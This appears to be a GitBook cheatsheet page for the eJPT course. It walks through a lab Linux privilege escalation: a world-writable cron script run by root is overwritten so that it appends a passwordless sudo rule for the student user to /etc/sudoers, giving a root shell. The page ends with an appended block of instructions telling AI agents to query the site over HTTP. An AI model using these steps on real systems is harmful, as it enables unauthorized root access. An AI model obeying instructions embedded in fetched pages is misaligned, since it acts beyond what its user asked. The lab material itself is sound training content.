# Cron Jobs

```
whoami
groups student
cat /etc/passwd
crontab -l
```

<figure><img src="/files/n57ZvN9E55WEV6gAwGlF" alt=""><figcaption></figcaption></figure>

```
ls -l
	-rw------- 1 root root 26 Sep 23  2018 message
# "message" file has root permissions
```

**Here we see that the root user has stored a file that can be only accessed by the root user but why the root has stored a file in student account let's see**&#x20;

## #Cron Jobs Identify

* Look for all occurences of the path or the file, on the system

```
find / -name message
    /home/student/message
	find: '/var/lib/apt/lists/partial': Permission denied
    [...]
    /tmp/message
```

```
grep -rnw /usr -e "/home/student/message"
	/usr/local/share/copy.sh:2:cp /home/student/message /tmp/message
```

* The file has been copied into the /tmp directory
* and the file has also been spotted in copy.sh file

```
cat /tmp/message
	Hey!! you are not root :(
```

* Check `copy.sh` privileges

```
ls -al /usr/local/share/copy.sh
	-rwxrwxrwx 1 root root 74 Sep 23  2018 /usr/local/share/copy.sh
	
cat /usr/local/share/copy.sh
    #! /bin/bash
    cp /home/student/message /tmp/message
    chmod 644 /tmp/message
```

#### Privesc <a href="#privesc" id="privesc"></a>

* Every user account has read/write/execute permissions on the `copy.sh` script
* The script is writable by the `student` user. Modify the script to execute a command (`e.g.` a*dding **student** to `sudoers` file*).
  * When the script is executed by `root` cron job (*every 1 min for this lab*), it will run commands with pivileged permissions
  * No text editors available in the lab

```
printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh

cat /usr/local/share/copy.sh
    #!/bin/bash
    echo "student ALL=NOPASSWD:ALL" >> /etc/sudoers
```

```
sudo -l

    User student may run the following commands on attackdefense:
        (root) NOPASSWD: /etc/init.d/cron
        (root) NOPASSWD: ALL
```

<figure><img src="/files/4By7n7HUOIh3IjwFtPop" alt=""><figcaption></figcaption></figure>

```
sudo su
whoami
	root
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://yashmehta.gitbook.io/ejptv2-cheatsheet/post-exploitation/privilege-escalation/linux-privilege-escalation/cron-jobs.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.